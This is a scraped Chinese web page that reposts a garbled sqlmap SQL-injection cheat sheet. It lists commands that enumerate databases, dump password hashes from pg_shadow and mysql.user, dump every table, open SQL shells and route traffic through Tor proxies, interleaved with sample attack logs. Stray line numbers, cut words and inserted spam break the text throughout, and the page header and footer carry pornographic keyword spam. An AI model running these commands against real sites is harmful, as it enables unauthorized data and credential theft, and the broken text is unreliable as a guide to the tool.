国产99久久精品_欧美日本韩国一区二区_激情小说综合网_欧美一级二级视频_午夜av电影_日本久久精品视频

最新文章專題視頻專題問答1問答10問答100問答1000問答2000關鍵字專題1關鍵字專題50關鍵字專題500關鍵字專題1500TAG最新視頻文章推薦1 推薦3 推薦5 推薦7 推薦9 推薦11 推薦13 推薦15 推薦17 推薦19 推薦21 推薦23 推薦25 推薦27 推薦29 推薦31 推薦33 推薦35 推薦37視頻文章20視頻文章30視頻文章40視頻文章50視頻文章60 視頻文章70視頻文章80視頻文章90視頻文章100視頻文章120視頻文章140 視頻2關鍵字專題關鍵字專題tag2tag3文章專題文章專題2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章專題3
問答文章1 問答文章501 問答文章1001 問答文章1501 問答文章2001 問答文章2501 問答文章3001 問答文章3501 問答文章4001 問答文章4501 問答文章5001 問答文章5501 問答文章6001 問答文章6501 問答文章7001 問答文章7501 問答文章8001 問答文章8501 問答文章9001 問答文章9501
當前位置: 首頁 - 科技 - 知識百科 - 正文

注入常用語句

來源:懂視網 責編:小采 時間:2020-11-09 10:09:19
文檔

注入常用語句

注入常用語句:注入常用語句 T users sinp 4 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) DBMS: PostgreSQL : users id blissettnameisnull bunnyming 這個東西,是mickey整理的,不多說了,尊重一下原作者,轉載注明mi
推薦度:
導讀注入常用語句:注入常用語句 T users sinp 4 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) DBMS: PostgreSQL : users id blissettnameisnull bunnyming 這個東西,是mickey整理的,不多說了,尊重一下原作者,轉載注明mi

注入常用語句 T users sinp 4 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) DBMS: PostgreSQL : users id blissettnameisnull bunnyming 這個東西,是mickey整理的,不多說了,尊重一下原作者,轉載注明mickey整理就好了 21 22 更新 23

注入常用語句

T users sinp> 4 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) DBMS: PostgreSQL : users id blissett nameisnull bunny ming 這個東西,是mickey整理的,不多說了,香港服務器,尊重一下原作者,轉載注明mickey整理就好了 21 22 更新 23 svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev m=1″ -v 1 –sql-shell //執行SQL語句 m更詳細的信息 options from a configuration INI file 30 sqlmap -c sqlmap.conf 31 32 使用POST方法提交 sqlmap/oracle/post_int.php” –method POST –data “id=1″ 使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData來抓cookies sqlmap使用referer欺騙 sqlmap使用自定義user-agent,或者使用隨機使用自帶的user-agents.txt sqlmapagent “Mozillapython sqlmap.py sqlmapa “.agents.txt” 46 47 使用基本認證 sqlmap使用Digest認證 sqlmap使用代理,配合TOR sqlmap.1.47:3128″ sqlmap.1.47:8118″ 56 57 使用多線程猜解 sqlmap–threads 繞過動態檢測,直接指定有注入點的參數,可以使用,分割多個參數,指定user-agent注入 sqlmapp “id sqlmapcatp “cat,id” sqlmapagent” –.7rc1 (http://sqlmap.sourceforge.net)” 64 65 指定數據庫,繞過SQLMAP的自動檢測 sqlmap/pgsql/get_int.php?id=1″ -v 2 –dbms “PostgreSQL” MySQL 69 * Oracle 70 * PostgreSQL 71 * Microsoft SQL Server 72 73 指定操作系統,繞過SQLMAP自動檢測 sqlmap/pgsql/get_int.php?id=1″ -v 2 –os “Windows” Linux 77 * Windows 78 79 自定義payload 80 Options: –prefix and –postfix circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix. users . “‘) LIMIT 0, 1″;: .″ test” 87 88 [...] 89 [hh:mm:16] [INFO] testing sql injection on GET parameter ‘id’ with 0 parenthesis 90 [hh:mm:16] [INFO] testing custom injection on GET parameter ‘id’ 91 [hh:mm:16] [TRAFFIC OUT] HTTP request: 92 GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20 93 %28%27test%27=%27test HTTP/1.1 94 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 95 Host: 192.168.1.121:80 96 Accept-language: en-us,en;q=0.5 97 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, 98 image/png,*/*;q=0.5 99 User-agent: sqlmap/0.7rc1 () 100 Connection: close 101 [...] 102 [hh:mm:17] [INFO] GET parameter ‘id’ is custom injectable 103 [...] 104 105 As you can see, the injection payload for testing for custom injection is: 106 107 id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test 108 109 which URL decoded is: test makes the query syntatically correct to the page query: users (‘test’='test’) LIMIT 0, 1 116 117 In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it. 118 119 頁面比較 120 python sqlmap.py -u “?id=1″ –string “luther” -v 1 121 python sqlmap.py -u “?id=1″ –regexp “lu[\w][\w]er” -v 122 123 排除網站的內容 124 python sqlmap.py -u “?id=1″ –excl-reg “Dynamic content: ([\d]+)” 125 126 多語句測試,php內嵌函數mysql_query(),不支持多語句 127 python sqlmap.py -u “?id=1″ –stacked-test -v 1 128 129 union注入測試 130 python sqlmap.py -u “?id=1″ –union-test -v 1 131 132 unionz注入配合orderby 133 python sqlmap.py -u “?id=1″ –union-test –union-tech orderby -v 1 134 135 python sqlmap.py -u “?id=1″ -v 1 –union-use –banner 136 python sqlmap.py -u “?id=1″ -v 5 –union-use –current-user 137 python sqlmap.py -u “?id=1″ -v 1 –union-use –dbs 138 139 fingerprint 140 python sqlmap.py -u “?id=1″ -v 1 -f 141 python sqlmap.py -u “?name=luther” -v 1 -f -b 142 143 判斷當前用戶是否是dba 144 python sqlmap.py -u “?id=1″ –is-dba -v 1 145 146 列舉數據庫用戶 147 python sqlmap.py -u “?id=1″ –users -v 0 148 149 列舉數據庫用戶密碼 150 python sqlmap.py -u “?id=1″ –passwords -v 0 151 python sqlmap.py -u “?id=1″ –passwords -U sa -v 0 152 153 查看用戶權限 154 python sqlmap.py -u “?id=1″ –privileges -v 0 155 python sqlmap.py -u “?id=1″ –privileges -U postgres -v 0 156 157 列數據庫 158 python sqlmap.py -u “?id=1″ –dbs -v 0 159 160 列出指定數據庫指定表的列名 161 python sqlmap.py -u “?id=1″ –columns -T users -D test -v 1 162 163 列出指定數據庫的指定表的指定列的內容 164 python sqlmap.py -u “?id=1″ –dump -T users -D master -C surname -v 0 165 166 指定列的范圍從2-4 167 python sqlmap.py -u “?id=1″ –dump -T users -D test –start 2 –stop 4 -v 0 168 169 導出所有數據庫,所有表的內容 170 python sqlmap.py -u “?id=1″ –dump-all -v 0 171 172 只列出用戶自己新建的數據庫和表的內容 173 python sqlmap.py -u “?id=1″ –dump-all –exclude-sysdbs -v 0 174 175 sql query 176 python sqlmap.py -u “?id=1″ –sql-query “SELECT usename FROM pg_user” -v 0 177 python sqlmap.py -u “?id=1″ –sql-query “SELECT host, password FROM mysql.user LIMIT 1, 3″ -v 1 178 179 SELECT usename, passwd FROM pg_shadow ORDER BY usename 180 181 保存和恢復會話 182 python sqlmap.py -u “?id=1″ -b -v 1 -s “sqlmap.log” 183 184 保存選項到INC配置文件 185 python sqlmap.py -u “?id=1″ -b -v 1 –save ===================================================== 2、sqlmap -g "關鍵詞“ //這是通過google搜索注入,現在還不可以,不知道是什么原因,網站空間,可以直接修改為百度 194 3、 195 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 [hh:mm:25] [INFO] testing if the url is stable, wait a few seconds 199 [hh:mm:26] [INFO] url is stable id' is dynamic id' is dynamic id' is dynamic id' 204 [hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter [hh:mm:26] [INFO] confirming numeric/unescaped injection on GET idid' is numeric/unescaped injectable 209 [hh:mm:26] [INFO] testing MySQL ) 211 [hh:mm:26] [INFO] retrieved: 55 212 [hh:mm:26] [INFO] performed 20 queries in 0 seconds 213 [hh:mm:26] [INFO] confirming MySQL ) 215 [hh:mm:26] [INFO] retrieved: 1 216 [hh:mm:26] [INFO] performed 13 queries in 0 seconds 217 [hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 218 0, 1 219 [hh:mm:26] [INFO] retrieved: 5 220 [hh:mm:26] [INFO] performed 13 queries in 0 seconds 221 remote DBMS: MySQL >= 5.0.0 4、指定參數注入 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 228 -p "id" [hh:mm:17] [INFO] testing if the url is stable, wait a few seconds 232 [hh:mm:18] [INFO] url is stable id' 234 [hh:mm:18] [INFO] testing numeric/unescaped injection on parameter [hh:mm:18] [INFO] confirming numeric/unescaped injection on idid' is numeric/unescaped injectable 239 [...] Or if you want to provide more than one parameter, for instance: $ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 246 1 -p "cat,id" 5、指定方法和post的數據 250 python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" -- 251 data "id=1&cat=2" 6、指定cookie,可以注入一些需要登錄的地址 255 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie 256 "COOKIE_VALUE" 7、通過代理注入 260 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy 261 "http://127.0.0.1:8118" 262 8、指定關鍵詞,香港服務器,也可以不指定。程序會根據返回結果的hash自動判斷 263 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string 264 "STRING_ON_TRUE_PAGE" 265 9、指定數據,這樣就不用猜測其他的數據庫里。可以提高效率。 266 --remote-dbms 267 10、指紋判別數據庫類型 268 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f 269 11、獲取banner信息 270 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b .

posted on

聲明:本網頁內容旨在傳播知識,若有侵權等問題請及時與本網聯系,我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com

文檔

注入常用語句

注入常用語句:注入常用語句 T users sinp 4 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) DBMS: PostgreSQL : users id blissettnameisnull bunnyming 這個東西,是mickey整理的,不多說了,尊重一下原作者,轉載注明mi
推薦度:
標簽: 常用 語句 注入
  • 熱門焦點

最新推薦

猜你喜歡

熱門推薦

專題
Top
主站蜘蛛池模板: 欧美1区二区三区公司 | 日韩精品第一 | 日韩欧美一区二区三区在线视频 | 欧美高清a | 日韩欧美专区 | 亚洲国内精品 | 亚洲国产精品一区二区久 | 亚洲日韩区在线电影 | 在线视频亚洲 | 欧美日韩专区 | www.香蕉视频在线观看 | 国产成人亚洲精品影院 | 亚洲三级电影在线 | 精品国产综合区久久久久99 | 精品亚洲一区二区 | 91第一页 | 亚洲国产综合专区在线电影 | 国产日韩欧美综合在线 | 国产日韩欧美亚洲综合在线 | 亚洲精品第1页 | 日韩欧美视频在线 | 久久一区二区三区精品 | 精品国产一区二区三区免费看 | 国产亚洲视频在线观看 | 国产免费资源高清小视频在线观看 | 成人国产激情福利久久精品 | 亚洲欧美日韩在线精品一区二区 | 欧美一区2区 | 欧美人善交 | 国产资源在线看 | 欧美日韩国 | 亚欧洲精品在线视频免费观看 | 91亚洲欧美综合高清在线 | 国产毛片一区二区三区精品 | 亚洲欧美另类在线观看 | 欧美 日韩 国产 成人 在线观看 | wwww欧美| 日本成人a | 久久99一区 | 人人爽天天碰天天躁夜夜躁 | 国产在线播放网站 |